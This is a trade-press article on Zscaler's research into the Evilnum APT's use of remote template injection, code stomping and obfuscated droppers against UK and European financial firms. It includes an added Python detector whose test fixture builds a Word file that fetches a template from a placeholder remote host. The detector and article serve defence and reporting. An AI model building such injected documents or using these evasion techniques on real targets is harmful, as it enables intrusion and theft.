
How Evilnum Cyberattacks Target Microsoft Office Files


Zscaler, creator of the Zero Trust Exchange platform, is keeping close watch on the advanced persistent threat (APT) actor known as Evilnum.

Since the start of 2022, Zscaler's ThreatLabz research team has identified several instances of Evilnum's low-volume, targeted attack campaigns launched against its customers in the UK and Europe.

Microsoft Office the Preferred Target

In earlier campaigns observed in 2021, Evilnum delivered Windows shortcut (LNK) files inside malicious ZIP archives attached to spear-phishing emails, Zscaler reports. Now the threat actor weaponizes Microsoft Office documents through remote template injection: the document itself carries no macro, but when it is opened, Word follows an embedded link and downloads a macro-enabled template from an attacker-controlled server, which then delivers the malicious payload to the victim's machine.

ThreatLabz has also identified several domains associated with Evilnum that flew under the radar and remained undetected for an extended period, according to Zscaler.
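A quick way to triage documents for the remote template injection technique described above is to look inside the document package itself. A .docx is a ZIP archive, and the attached template is recorded as a relationship of type attachedTemplate in word/_rels/settings.xml.rels; a benign document either has none or points at a local file, while an injected one points at an http(s) URL with TargetMode="External". The following checker is an added example written for this article, not code from Zscaler's report or from the campaign; the two sample documents are constructed in memory and the template URL and file names are placeholders, not indicators from any real attack.

```python
"""Flag Office Open XML (.docx) files that fetch a remote template on open.

Added example, not from the original article or Zscaler's report. The docx
samples below are constructed in memory; the URL and file names are
placeholders, not real indicators.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
SETTINGS_RELS = "word/_rels/settings.xml.rels"
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
OFFICE_REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def find_remote_templates(docx_bytes: bytes) -> list:
    """Return the network template URLs a .docx would fetch when opened (empty if none)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return hits  # no settings relationships: nothing to fetch
        root = ET.fromstring(zf.read(SETTINGS_RELS))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            target = rel.get("Target", "")
            # A local Normal.dotm is also External (file:///); only a network
            # scheme means Word will leave the machine to get the template.
            if rel.get("TargetMode") == "External" and re.match(r"(?i)^(https?|ftp)://", target):
                hits.append(target)
    return hits


def _make_docx(settings_rels_xml: str) -> bytes:
    """Build a minimal .docx package in memory (constructed sample, not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        )
        zf.writestr("word/document.xml", f'<?xml version="1.0"?><w:document xmlns:w="{WML_NS}"/>')
        # settings.xml references the template relationship by id; the rels file resolves it.
        zf.writestr(
            "word/settings.xml",
            f'<?xml version="1.0"?><w:settings xmlns:w="{WML_NS}" xmlns:r="{OFFICE_REL_NS}">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>',
        )
        if settings_rels_xml:
            zf.writestr(SETTINGS_RELS, settings_rels_xml)
    return buf.getvalue()


# Constructed samples: one with a local template, one with a remote (injected) template.
BENIGN_DOCX = _make_docx(
    '<?xml version="1.0"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm" TargetMode="External"/>'
    '</Relationships>'
)
INJECTED_DOCX = _make_docx(
    '<?xml version="1.0"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="https://template.example/compliance.dotm" TargetMode="External"/>'
    '</Relationships>'
)

if __name__ == "__main__":
    for name, blob in (("benign.docx", BENIGN_DOCX), ("injected.docx", INJECTED_DOCX)):
        urls = find_remote_templates(blob)
        print(f"{name}: {'REMOTE TEMPLATE ' + ', '.join(urls) if urls else 'no remote template'}")
```

Because the lure document contains no VBA of its own, macro scanners that only inspect the attachment miss this; the relationship check above catches the download step, and the URL it surfaces is what to match against the freshly registered, industry-themed domains Zscaler describes. The check covers Word's settings.xml.rels only; other Office formats store template references elsewhere.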

What We Know About the Evilnum APT

  • Key targets are predominantly in the financial services sector, specifically companies dealing with trading and compliance in the UK and Europe.
  • March 2022 saw a notable broadening of targets, including an intergovernmental organization that manages international migration services.
  • The timing of the attacks and the choice of targets coincided with the Russia-Ukraine conflict.
  • Macro-based documents used a VBA code stomping technique to bypass static analysis and hinder reverse engineering.
  • A heavily obfuscated JavaScript was used to decrypt and drop the payloads on the endpoint.
  • The names of all file system artifacts created during execution mimicked the names of legitimate Windows and third-party binaries.
  • In each new instance of the campaign, Evilnum registered multiple domain names using keywords specific to the industry vertical being targeted.
Jim Masters

Jim Masters is Managing Editor of MSSP Alert, and holds a B.A. degree in Journalism from Northern Illinois University. His career has spanned governmental and investigative reporting for daily newspapers in the Northwest Indiana Region and 16 years in a global internal communications role for a Fortune 500 professional services company. Additionally, he is co-owner of the Lake County Corn Dogs minor league baseball franchise, located in Crown Point, Indiana. In his spare time, he enjoys writing and recording his own music, oil painting, biking, volleyball, golf and cheering on the Corn Dogs.